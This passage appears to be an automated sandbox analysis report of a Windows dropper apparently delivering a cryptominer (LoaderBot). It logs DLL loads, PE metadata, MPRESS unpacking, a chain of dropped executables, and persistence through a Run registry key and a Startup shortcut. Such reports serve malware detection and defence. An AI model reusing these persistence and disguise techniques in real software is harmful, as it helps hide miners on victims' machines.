                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: h2UFp4aCRq.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: h2UFp4aCRq.exeStatic file information: File size 5061451 > 1048576
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: h2UFp4aCRq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: h2UFp4aCRq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdb source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdbP source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: h2UFp4aCRq.exe, rolex.exe.0.dr
                  Source: h2UFp4aCRq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: h2UFp4aCRq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: h2UFp4aCRq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: h2UFp4aCRq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: h2UFp4aCRq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeUnpacked PE file: 5.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Yara detected LoaderBot
                  Source: Yara matchFile source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rolex.exe PID: 6584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: yondex.exe PID: 6936, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPED
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6321171Jump to behavior
                  Source: rolex.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x469fd4
                  Source: h2UFp4aCRq.exeStatic PE information: real checksum: 0x0 should be: 0x4e37cd
                  Source: Driver.exe.4.drStatic PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
                  Source: yondex.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x401e1a
                  Source: h2UFp4aCRq.exeStatic PE information: section name: .didat
                  Source: h2UFp4aCRq.exeStatic PE information: section name: _RDATA
                  Source: rolex.exe.0.drStatic PE information: section name: .didat
                  Source: rolex.exe.0.drStatic PE information: section name: _RDATA
                  Source: Driver.exe.4.drStatic PE information: section name: .MPRESS1
                  Source: Driver.exe.4.drStatic PE information: section name: .MPRESS2
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655965156 push rsi; retf 0_2_00007FF655965157
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655965166 push rsi; retf 0_2_00007FF655965167
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4D5166 push rsi; retf 3_2_00007FF7AB4D5167
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4D5156 push rsi; retf 3_2_00007FF7AB4D5157
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C704E7 push eax; retn 0000h12_2_00C70502
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C704E7 push eax; retn 0000h12_2_00C7055A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C71027 push ds; retn 0000h12_2_00C7102A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C70838 push ss; retn 0000h12_2_00C7083A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C70569 push ecx; retn 0000h12_2_00C7056A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C70577 push ecx; retn 0000h12_2_00C7057A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C70E99 push ds; retn 0000h12_2_00C70E9A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C70FC8 push ds; retn 0000h12_2_00C70FCA
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJump to dropped file
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
